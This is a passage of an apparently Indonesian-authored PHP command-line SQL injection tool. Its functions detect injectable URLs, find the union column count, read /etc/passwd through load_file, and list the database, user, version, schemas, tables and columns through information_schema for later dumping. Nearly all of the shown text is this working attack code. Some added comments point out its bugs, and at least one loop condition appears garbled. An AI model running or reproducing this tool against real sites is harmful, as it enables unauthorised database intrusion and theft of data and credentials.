$panjang_kedua) { echo "\n[+][+]W00t !!! Found possible blind sqli at : ". $urlx."\n"; $a=NULL; $a="\n[+][+]W00t !!! Found possible blind sqli at : ". $urlx."\n"; tulisfile($a); } else { echo "\n[-] Sorry no possible blind sqli found here ! \n"; } } echo "\n"; } function opsi_1() { global $a,$otomatis,$ch,$hasilcek2,$generalerror,$wzap,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; echo "Type an url for sql injection vulnerability checking:\n"; //"Type an url for sql injection vulnerability checking:\n"; $url = trim(fgets(STDIN)); cek_kutip($url); cek_order_by_100($url); cek_blind($url); die(); } function opsi_2() { global $r1,$r2,$r3,$filemode,$a,$otomatis,$ch,$hasilcek2,$generalerror,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; echo "Type text file with target url(s) for sql injection vulnerability checking:\n"; $file = trim(fgets(STDIN)); echo "***************working please wait*************** \n"; // "Type text file with target url(s) for sql injection vulnerability checking:\n"; //$file; // "***************working please wait*************** \n"; $filemode="ya"; $wzap=1; bacalist($file); while (!feof($handle)) // Loop till end of life thread of this object. { $url=fgets($handle, 4096); // Read a line. 
$url=trim($url); if(!empty($url)) { cek_order_by_100($url); cek_blind($url); } $wzap++; } die(); } function opsi_3() { global $a,$otomatis,$ch,$c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; echo "Type text file with target url(s) for column finder:\n"; //"Type text file with target url(s) for column finder:\n"; $file = trim(fgets(STDIN)); echo "\n(if you don't type max column length to search, max column search will be 100)"; echo "\nType max column length number to search for every target:\n"; $jum = trim(fgets(STDIN)); if(empty($jum)) { $jum=100; } echo "***************working please wait*************** \n"; //"***************working please wait*************** \n"; $wzap=1; bacalist($file); while (!feof($handle)) // Loop till end of life thread of this object. { $url=fgets($handle, 4096); // Read a line. 
$url=trim($url); echo "\nurl: $url\n"; colfinder($url,$jum); $wzap++; } } function blind_colfinder($url,$jum) { global $ketemu,$a,$otomatis,$c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; $found=FALSE; $jum2=1; $jum++; $string_no=NULL; $url_blind=NULL; $mywisdom="concat(0x6d79776973646f6d)"; $mywisdom2="concat(0x6d79776973646f6d),"; $url_blind2=NULL; $url_blind3=NULL; $url_blind_code=NULL; $wisdom="mywisdom"; $hasilcek=FALSE; if(empty($jum)) { $jum=100; } $found=FALSE; if(!empty($url)) { while(!($found) and ($jum2<$jum)) { $page=NULL; $hasilcek=FALSE; if($jum2==1) { $url_blind=$url."+and+1=7+union+all+select+$mywisdom--"; $url_blind_code=$url."+and+1=7+union+all+select+c0de--"; $urlc0de=$url_blind_code; } else { $jum3=$jum2-1; $rep=str_repeat($mywisdom2,$jum3); $url_blind=$url."+and+1=7+union+all+select+".$rep.$mywisdom."--"; } echo "\n[-]Checking column length for blind sqli : $jum2\n"; $urlx=$url_blind; basic_curl($urlx); $hasilcek=InStr($page,$wisdom); if($hasilcek) { echo $urlx."\n"; echo "[+] W00t !!!! Found column length: $jum2\n"; echo "[+] W00t !!!! Found blind sqli url at: $url_blind \n"; $a=NULL; $a= "[+] W00t !!!! Found column length: $jum2\n"; $a.= "[+] W00t !!!! Found blind sqli url at: $url_blind \n"; tulisfile($a); $ketemu=TRUE; $found=TRUE; } $jum2++; } //buat format url angka if($jum2>1) { $url_blind2=$url."+and+777=888+union+all+select+"; $x=1; while($x<$jum2) { $url_blind2=$url_blind2.$x.","; $x++; } $x--; $cari=$x.","; $penganti=$x."--"; $url_blind3=str_replace($cari, $penganti, $url_blind2); basic_curl($url_blind3); $hasilcek=InStr($page,$wisdom); if($hasilcek) { echo "\n[+]W00t!!! found sqli url: ".$url_blind3."\n"; $a=NULL; $a="\n[+]W00t!!! 
found sqli url: ".$url_blind3."\n"; $ketemu=TRUE; tulisfile($a); } $x2=$x; $x=2; $kode=FALSE; while(($x<$x2) and !($kode)) { $cari=",".$x; $penganti=",".$mywisdom; $url_blind3=str_replace($cari, $penganti, $url_blind3); $urlx=$url_blind3; basic_curl($urlx); $hasilcek=InStr($page,$wisdom); if($hasilcek) { $urlc0de=str_replace($mywisdom,"c0de", $urlx); $kode=TRUE; $ketemu=TRUE; } $url_blind3=str_replace($penganti, $cari, $url_blind3); $x++; } } //eof buat format url angka if($kode) { $ketemu=TRUE; echo "[+] W00t !!!! Found code url: $urlc0de\n"; $a="[+] W00t !!!! Found code url: $urlc0de\n"; tulisfile($a); } } //eof !empty url } function colfinder($url,$jum) { global $a,$otomatis,$c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; $panjang=NULL; $cek=NULL; $found=FALSE; $jum2=NULL; $hasilcek=NULL; $hasilcek2=NULL; $sqliurl=NULL; $stringunion=NULL; if(empty($jum)) { $jum=100; } if(!empty($url)) { $jum2=1; $jum++; $cek="order+by+".$jum2."--"; $protokol="http://"; $error="Unknown column"; $generalerror="supplied argument is not a valid MySQL result resource"; $tes=strstr($url,$protokol); if(!$tes) { $url=$protokol.$url; } $urlx=$url."+".$cek; echo "\nChecking column using basic sqli: "; // "\nChecking column: "; while(!$found and ($jum2<$jum)) { basic_curl($urlx); $hasilcek=strstr($page,$error); $hasilcek2=strstr($page,$generalerror); if($hasilcek) { $found=TRUE; $panjang=$jum2-1; } else { echo "$jum2".","; $jum2=$jum2+1; $cek="order+by+".$jum2."--"; $urlx=$url."+".$cek; $found=FALSE; } if($hasilcek2) { $found=TRUE; $panjang=$jum2-2; } } $trik=1; while($trik<$panjang+1) { if($trik==$panjang) { $stringunion.=$trik."--"; } else { $stringunion.=$trik.","; } $trik++; } $sqliurl=$url."+and+1=7+union+select+"; $sqliurl.=$stringunion; if(!empty($stringunion)) { echo 
"\n[+]W00t!! found column length:$panjang\n"; echo "[+]SQLi url:$sqliurl\n"; echo "-----------------------------------------\n"; $a="\n[+]W00t!! found column length:$panjang\n"; $a.="[+]SQLi url:$sqliurl\n"; $a.="-----------------------------------------\n"; tulisfile($a); if(empty($file)) { cekposisicode($sqliurl,$panjang); echo "[+]c0de url:$urlc0de"; $a="[+]c0de url:$urlc0de"; tulisfile($a); } } else { echo "\nSorry column lenth couldn't be found using basic sqli check ,now testing blind sqli checking...please wait!!! \n"; //"\nSorry column lenth couldn't be found ! \n"; } } else { echo "\nSorry target url is empty!!!!\n "; // "\nSorry target url is empty!!!!\n "; } } function opsi_4() { global $a,$otomatis,$c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; echo "\nType your target url:\n"; $url = trim(fgets(STDIN)); echo "\n(if you don't type max column length to search, max column search will be 100)"; echo "\nType max column length number to search:\n"; $jum = trim(fgets(STDIN)); // "\nType your target url:\n"; //$url; // "\n(if you don't type max column length to search, max column search will be 100)"; // "\nType max column length number to search:\n"; //$jum; colfinder($url,$jum); if(empty($urlc0de)) { blind_colfinder($url,$jum); } } function cekposisicode($sqliurl,$panjang) { global $a,$otomatis,$c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; $cekmysqluser="concat(0x43757272656e745f757365723a27,current_user(),0x27),"; $cekmysqluser2="concat(0x43757272656e745f757365723a27,current_user(),0x27)--"; $c0de="c0de,"; $found2=FALSE; $datauser="Current_user:'"; 
/* Tail of cekposisicode($sqliurl,$panjang): the signature, the global list and
   the first assignments are on the previous line. Note that the global list
   there includes $sqliurl and $panjang, so both parameters are rebound to the
   globals of the same name and the caller's arguments are discarded. */
$cekmysqldb="concat(0x44617461626173653a27,database(),0x27),"; // assigned here but never read in this function
$trik=1;
// Termination depends solely on $found2 becoming truthy. $trik is not bounded
// by $panjang: once it grows past the column count the "N," needle no longer
// matches anything and every further probe sends the unmodified $sqliurl, so
// a target that never echoes $datauser keeps this loop running. Also note that
// str_replace() replaces every occurrence of "N," (e.g. "1," inside "11,").
while(!$found2) {
    $trik2=$trik.",";
    if($trik<$panjang) {
        $urlx = str_replace($trik2,$cekmysqluser,$sqliurl);
        $akhir="belum"; // Indonesian "not yet": not the last column, comma variant used
    } else {
        $urlx = str_replace($trik2,$cekmysqluser2,$sqliurl);
        $akhir="iya"; // "yes": last column, "--" variant used
    }
    basic_curl($urlx); // defined elsewhere in the file; fills global $page
    $found2=strstr($page,$datauser);
    if($found2) {
        // Rebuild the URL with the "c0de" placeholder at the column that echoed back.
        if($akhir=="iya") {
            $urlc0de = str_replace($cekmysqluser2,$c0de,$urlx);
        } else {
            $urlc0de = str_replace($cekmysqluser,$c0de,$urlx);
        }
    }
    $trik++;
}
}

/**
 * Menu option 5: make sure a marker URL is available in global $urlc0de and
 * hand off to infomysql().
 *
 * The prompt is only shown when $urlc0de is still empty. fgets(STDIN) returns
 * false on EOF; trim(false) yields "" here, so an empty value simply flows on
 * to infomysql(), which reports the missing "c0de" marker itself.
 */
function opsi_5() {
    global $a,$otomatis,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable;
    if(empty($urlc0de)) {
        echo "\nType target url c0de from previous scan:\n";
        $urlc0de = trim(fgets(STDIN));
        //"\nType target url c0de from previous scan:\n".$urlc0de;
    }
    infomysql();
}

/**
 * Linear substring search: returns true when $Find occurs in $String,
 * false otherwise. An empty $Find returns true immediately.
 *
 * Quirks to be aware of before reusing this helper:
 *  - the $CaseSensitive flag is inverted: when it is true BOTH strings are
 *    lower-cased, which makes the comparison case-INsensitive;
 *  - the comparison uses loose ==, so numeric-looking substrings compare
 *    numerically ("1e3" == "1000");
 *  - the loop runs to strlen($String) inclusive and calls substr() each
 *    time, i.e. O(len($String) * len($Find)). str_contains() / stripos()
 *    give the same answer in one call.
 */
function InStr($String,$Find,$CaseSensitive = false) {
    $i=0;
    while (strlen($String)>=$i) {
        unset($substring); // no-op: $substring is reassigned right below
        if ($CaseSensitive) {
            // Re-lower-casing on every iteration is redundant but harmless.
            $Find=strtolower($Find);
            $String=strtolower($String);
        }
        $substring=substr($String,$i,strlen($Find));
        if ($substring==$Find) return true;
        $i++;
    }
    return false;
}

/* cek_load_file() starts here; its global list continues on the next line
   and its body follows there. $a is listed twice in the global list (harmless). */
function cek_load_file() {
    global $a,$page2,$urlx2,$urlx,$myroot,$a,$otomatis,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2,
$c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; $load_file="load_file(0x2f6574632f706173737764)"; $urluser=str_replace($c0de,$load_file,$urlc0de); $myroot="root:x:"; $urlx2=$urluser; basic_curl2($urlx2); $hasilcek=InStr($page2,$myroot); if($hasilcek) { echo "-------------------------------------------------\n"; echo "\n[+]W00t! Found load file !!!\n"; echo "--------------------------------------------------\n"; echo "Check this out : $urluser\n"; echo "--------------------------------------------------\n"; $a= "-------------------------------------------------\n"; $a.="\n[+]W00t! Found load file !!!\n"; $a.="--------------------------------------------------\n"; $a.= "Check this out : $urluser\n"; $a.= "--------------------------------------------------\n"; tulisfile($a); } } function infomysql() { global $a,$otomatis,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; $url=$urlc0de; cekhttp(); $urlc0de=$url; $c0de="c0de"; $hasilcek=strstr($urlc0de,$c0de); if(!$hasilcek) { echo "\n[-]Sorry please enter url with c0de from previous scan !\n"; // "\n[-]Sorry please enter url with c0de from previous scan !\n"; } else { cek_load_file(); echo "\n[+]Getting MySQL Configurations...\n"; echo "--------------------------------------------------\n"; $a="\n[+]Getting MySQL Configurations...\n"; 
$a.="--------------------------------------------------\n"; tulisfile($a); $jepetandb="0x6a65706574616e6462"; $jepetandb1="concat(".$jepetandb.",database(),"; $jepetandb2=$jepetandb.")"; $jepetandbx=$jepetandb1.$jepetandb2; $jepetanuser="0x6a65706574616e75736572"; $jepetanuser1="concat(".$jepetanuser.",current_user(),"; $jepetanuser2=$jepetanuser.")"; $jepetanuserx=$jepetanuser1.$jepetanuser2; $jepetanversi="0x6a65706574616e7665727369"; $jepetanversi1="concat(".$jepetanversi.",version(),"; $jepetanversi2=$jepetanversi.")"; $jepetanversix=$jepetanversi1.$jepetanversi2; $urldb=str_replace($c0de,$jepetandbx,$urlc0de); $urlx=$urldb; basic_curl($urlx); $araydb=explode("jepetandb", $page); if(!$araydb) { echo "[-]Error!!! Sorry Database name not found !\n"; //"[-]Error!!! Sorry Database name not found !\n"; } else { $namadb=$araydb[1]; if(!empty($namadb)) { echo "[+]Database : $namadb\n"; $a="[+]Database : $namadb\n"; tulisfile($a); } else { echo "[-]Sorry Database name not found !\n"; } } $urluser=str_replace($c0de,$jepetanuserx,$urlc0de); $urlx=$urluser; basic_curl($urlx); $arayuser=explode("jepetanuser",$page); if(!$arayuser) { echo "[-]Error !!! Sorry Current User Name not found !\n"; } else { $namauser=$arayuser[1]; if(!empty($namauser)) { echo "[+]Current User : $namauser\n"; $a="[+]Current User : $namauser\n"; tulisfile($a); } else { echo "[-]Sorry Current User Name not found !\n"; } } $urlversi=str_replace($c0de,$jepetanversix,$urlc0de); $urlx=$urlversi; basic_curl($urlx); $arayversi=explode("jepetanversi",$page); if(!$arayversi) { echo "[-]Error !!! 
Sorry Database Version not found !\n"; }
// Tail of infomysql(): the string literal above is continued from the previous
// line (it contains a real line break). This else-branch reports the value
// between the two version markers, if any.
else {
    $namaversi=$arayversi[1]; // index 1 exists only if the marker was echoed back
    if(!empty($namaversi)) {
        echo "[+]MySQL version : $namaversi\n";
        $a= "[+]MySQL version : $namaversi\n";
        tulisfile($a);
    } else {
        echo "[-]Sorry MySQL version not found !\n";
    }
}
} // closes the else-branch taken when the "c0de" marker was present
} // end of infomysql()

/**
 * Classify the target's MySQL major version as "4" or "5" in global
 * $namaversi and record $mysql_port_open.
 *
 * NOTE: `global $urlc0de` below rebinds the parameter to the global of the
 * same name, so the argument passed by the caller is discarded.
 *
 * When global $scanport is "yes": the host is taken from the third
 * "/"-separated segment of the URL (no port or userinfo handling) and a TCP
 * connection to 3306 is attempted with warnings suppressed by "@". If it
 * fails, the version is read through the injected version() marker; if it
 * succeeds, one line is read from the socket and the substring "4." decides
 * the answer. The socket is never fclose()d. When $scanport is anything else
 * the marker path is used directly.
 *
 * Defects visible in this function (left as-is):
 *  - $mysql_port_open is set to "no" and then unconditionally to "yes" a few
 *    statements later, so it never ends up reporting "no";
 *  - $arayversi[1] is read without checking it exists; explode() never
 *    returns false for a missing delimiter, so the `if(!$arayversi)` guard
 *    never fires and a missing marker yields an undefined-index read;
 *  - $res is appended to (.=) but never reset here, so it accumulates across
 *    calls unless cleared elsewhere;
 *  - any page or banner containing "4." anywhere is classified as MySQL 4;
 *  - the marker-based branch is duplicated verbatim in both paths.
 */
function cek_mysql($urlc0de) {
    global $scanport,$fp,$errno,$errstr,$message,$res;
    global $a,$otomatis,$mysql_port_open,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable;
    if($scanport=="yes") {
        $message="\nhelp\n";
        $arayhost = explode("/", $urlc0de);
        $host=$arayhost[2]; // assumes "scheme://host/..." — no validation of the URL shape
        $port = 3306;
        $fp = @fsockopen ($host, $port, $errno, $errstr); // "@" hides the failure reason; $errstr is never shown
        if (!$fp) {
            $mysql_port_open="no"; // overwritten by the unconditional "yes" below
            $jepetanversi="0x6a65706574616e7665727369";
            $jepetanversi1="concat(".$jepetanversi.",version(),";
            $jepetanversi2=$jepetanversi.")";
            $jepetanversix=$jepetanversi1.$jepetanversi2;
            $urlversi=str_replace($c0de,$jepetanversix,$urlc0de);
            $urlx=$urlversi;
            basic_curl($urlx); // defined elsewhere in the file; fills global $page
            $arayversi=explode("jepetanversi",$page);
            if(!$arayversi) { echo "[-]Error !!! 
Sorry Database Version not found !\n"; } // never true: explode() returns a non-empty array
            $mysql_port_open="yes";
            $namaversi=$arayversi[1]; // undefined index when the marker was not echoed back
            if(strstr($namaversi,"4.")) { $namaversi="4"; } else { $namaversi="5"; }
        } else {
            fputs ($fp, $message);
            $res.= fgets ($fp, 1024); // appended to the global; no fclose($fp) afterwards
            if(strstr($res,"4.")) { $namaversi="4"; } else { $namaversi="5"; }
        }
    } //eof if scan port yes
    else {
        // Same marker-based detection as the failed-connect branch above.
        $jepetanversi="0x6a65706574616e7665727369";
        $jepetanversi1="concat(".$jepetanversi.",version(),";
        $jepetanversi2=$jepetanversi.")";
        $jepetanversix=$jepetanversi1.$jepetanversi2;
        $urlversi=str_replace($c0de,$jepetanversix,$urlc0de);
        $urlx=$urlversi;
        basic_curl($urlx);
        $arayversi=explode("jepetanversi",$page);
        if(!$arayversi) { echo "[-]Error !!! Sorry Database Version not found !\n"; } // never true, see above
        $mysql_port_open="yes";
        $namaversi=$arayversi[1];
        if(strstr($namaversi,"4.")) { $namaversi="4"; } else { $namaversi="5"; }
    }
}

/**
 * Menu option 6: list the schema names the injected query can see.
 * Only the prompt and set-up are on this line; the rest of the body
 * continues on the next line. $jum is listed twice in the global list.
 */
function opsi_6() {
    global $currentdb,$fp,$errno,$errstr,$message,$res;
    global $a,$otomatis,$ukuranaray2,$no,$jum,$kontenaray,$panjangstring,$ukuranaray,$i,$evasion,$endschema,$urlschema,$stringschema,$mysql_port_open,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable;
    if(empty($urlc0de)) {
        echo "\nType target url c0de from previous scan:\n";
        $urlc0de = trim(fgets(STDIN)); // fgets() may return false on EOF; trim() then yields ""
        //"\nType target url c0de from previous scan:\n".$urlc0de;
    }
    $url=$urlc0de;
    cekhttp(); // defined elsewhere; presumably normalises the scheme on global $url — confirm
    $urlc0de=$url;
    infomysql();
    $currentdb=$namadb; // remember the current database name reported by infomysql()
    echo "\n****searching database(s) name from information_schema.schemata****\n";
    $a="\n****searching database(s) name from information_schema.schemata****\n";
    tulisfile($a);
    $evasion="--";
    $c0de="c0de";
$hasilcek=strstr($urlc0de,$c0de); if(!$hasilcek) { echo "\n[-]Sorry please enter url with c0de from previous scan !\n"; // "\n[-]Sorry please enter url with c0de from previous scan !\n"; } else { cek_mysql($urlc0de); if($namaversi=="4") { echo "\nSorry this step is for mysql 5+ !!! your target mysql is below 5\n"; } else { $endschema="+from+information_schema.schemata--"; $stringschema="group_concat(0x60,schema_name)"; $urlschema=str_replace($c0de,$stringschema,$urlc0de); $urlschema=str_replace($evasion,$endschema,$urlschema); $urlx=$urlschema; echo "\n[+]Checking url:$urlx\n"; basic_curl($urlx); $araydb=explode("`",$page); if(!$araydb) { echo "[-]Error!!! Sorry Databases Data this user has access not found!!!\n"; } else { $jum=0; $i=0; $ukuranaray=sizeof($araydb); $namadb=NULL; $no=1; $ukuranaray2=$ukuranaray+2; while($i<$ukuranaray2) { $i++; $kontenaray=$araydb[$i]; $panjangstring=strlen($araydb[$i]); if($panjangstring<50) { if(!empty($kontenaray) and !strstr($namadb,$kontenaray)) { $namadb.="\n[$no] ".$kontenaray; if(!strstr($namadb,$currentdb)) { $no++; $jum++; $namadb.="\n[$no] ".$currentdb; } $jum++; $no++; } } } $namadb=str_replace(",","",$namadb); if(!empty($namadb)) { echo "[+]W00t! Availabe database(s) information access here:\n"; echo "[+]Some Database(s) this user can access: $jum (sorry max database view around 100 database(s))\n"; echo "[+]Databases : $namadb\n"; $a="[+]W00t! 
Availabe database(s) information access here:\n"; $a.= "[+]Some Database(s) this user can access: $jum (sorry max database view around 100 database(s))\n"; $a.="[+]Databases : $namadb\n"; tulisfile($a); } } } } } function opsi_7() { global $string,$hex; global $ch2,$urlx2,$page2; global $fp,$errno,$errstr,$message,$res; global $a,$otomatis,$ix,$stok_kolor,$url_bejat,$kolor,$zzz,$araykolom,$strkoleva,$concatkolom,$oldurlc0de,$hextable,$tablehash,$namatabel2,$namatabel,$concatable,$endschema2,$no,$jum,$kontenaray,$panjangstring,$ukuranaray,$i,$evasion,$endschema,$urlschema,$stringschema,$mysql_port_open,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; if(empty($urlc0de)) { echo "\nType target url c0de from previous scan:\n"; $urlc0de = trim(fgets(STDIN)); //"\nType target url c0de from previous scan:\n".$urlc0de; } $url=$urlc0de; cekhttp(); $urlc0de=$url; $oldurlc0de=$urlc0de; $url_bejat=$urlc0de; infomysql(); $evasion="--"; $c0de="c0de"; $hasilcek=strstr($urlc0de,$c0de); if(!$hasilcek) { echo "\n[-]Sorry please enter url with c0de from previous scan !\n"; //"\n[-]Sorry please enter url with c0de from previous scan !\n"; } else { cek_mysql($urlc0de); if($namaversi=="4") { echo "\nSorry this step is for mysql 5+ !!! your target mysql is below 5\n"; //"\nSorry this step is for mysql 5+ !!! 
your target mysql is below 5\n"; } else { $evasion="--"; $stringschema="group_concat(0x60,table_name,0x60)"; $endschema="+from+information_schema.tables+where+table_schema=database()--"; //operasi info schema $urlschema=str_replace($c0de,$stringschema,$urlc0de); $urlschema=str_replace($evasion,$endschema,$urlschema); $urlx=$urlschema; echo "\n[+]Checking url:$urlx\n"; echo "\n****searching table(s) and column(s) from current database****\n"; $a="\n[+]Checking url:$urlx\n"; $a.="\n****searching table(s) and column(s) from current database****\n"; tulisfile($a); basic_curl($urlx); $araydb=explode("`",$page); if(!$araydb) { echo "[-]Error!!! Sorry Data can not be found!!!\n"; //"[-]Error!!! Sorry Data can not be found!!!\n"; } else { $namatabel=NULL; $i=1; $jum=0; $ukuranaray=sizeof($araydb); while($jum<$ukuranaray) { $concatable=$araydb[$jum]; if(strlen($concatable)<50) { $namatabel=$araydb[$jum]; $namatabel=str_replace(",","",$namatabel); $namatabel=trim($namatabel); if(strlen($namatabel)>1 and !strstr($tablehash,$namatabel)) { $tablehash.=$namatabel." 
"; $namatabel2=$namatabel; echo "[$i] $namatabel2 : "; $a="[$i] $namatabel2 : "; kolomschema($namatabel2,$oldurlc0de); $namatable2=NULL; echo "\n"; $a.="\n"; tulisfile($a); $i++; } } $jum++; } } $i--; echo "\nTotal table(s) found:$i\n"; $a="\nTotal table(s) found:$i\n"; tulisfile($a); //eof operasi info schema } } } function kolomschema($namatabel2,$oldurlc0de) { global $string,$hex; global $ch2,$urlx2,$page2; global $fp,$errno,$errstr,$message,$res; global $open_vms,$concatdump,$strdump,$strdump2,$aksidump,$otomatis,$stok_kolor,$url_bejat,$kolor,$zzz,$araykolom,$strkoleva,$concatkolom,$oldurlc0de,$hextable,$tablehash,$namatabel2,$namatabel,$concatable,$endschema2,$no,$jum,$kontenaray,$panjangstring,$ukuranaray,$i,$evasion,$endschema,$urlschema,$stringschema,$mysql_port_open,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; $string=$namatabel2; $strdump="concat(0x6d79776973646f6d,group_concat(0x3a"; $strdump2="),0x6d79776973646f6d)"; $concatdump=NULL; strToHex($string); $hextable="0x".$hex; $evasion="--"; $c0de="c0de"; $concatkolom="group_concat(0x60,column_name,0x60)"; $strkoleva="+from+information_schema.columns+where+table_name=$hextable--"; $oldurlc0de=$url_bejat; $oldurlc0de=str_replace($evasion,$strkoleva,$oldurlc0de); $oldurlc0de=str_replace($c0de,$concatkolom,$oldurlc0de); $urlx2=$oldurlc0de; basic_curl2($urlx2); $araykolom=explode("`",$page2); $zzz=1; while($zzz1 and strlen($kolor)<50) { if(!strstr($stok_kolor,$kolor)) { $stok_kolor.=$kolor; $kolor=str_replace(",","",$kolor); if($aksidump=="yes") { 
// Tail of kolomschema(). The loop header on the previous line reads
// `while($zzz1 and strlen($kolor)<50)`, which is not valid PHP; it looks like a
// "<...>" span was stripped as an HTML tag during extraction. Verify the loop
// bounds and the two conditionals closed below against the original source.
            $concatdump.=",".$kolor.",0x3a"; // dump mode: accumulate column names for a later concat
        } else {
            echo $kolor.","; // listing mode: print each new column name
            $a=$kolor.",";
            tulisfile($a);
        }
    } // closes if(!strstr($stok_kolor,$kolor)) from the previous line
    } // closes the (garbled) length check from the previous line — confirm
    $zzz++;
} // closes the while
$open_vms=$strdump.$concatdump.$strdump2; // only meaningful after a run with $aksidump=="yes"
$kolor=NULL;
$stok_kolor=NULL;
}

/**
 * Hex-encode a string, used to build a 0x... literal from a table name.
 *
 * NOTE: `global $string` below rebinds the parameter, so the argument is
 * ignored and the global $string (set by kolomschema() just before it calls
 * this) is encoded instead. The result is both returned and left in global
 * $hex; kolomschema() reads the global.
 *
 * dechex() output is not zero-padded: any byte below 0x10 yields a single hex
 * digit, which shifts every following byte in the literal. Table names from
 * the scanner are plain ASCII in practice, so this only bites on control
 * characters. The long global list is unused apart from $ix, $string and $hex.
 */
function strToHex($string) {
    global $fp,$errno,$errstr,$message,$res;
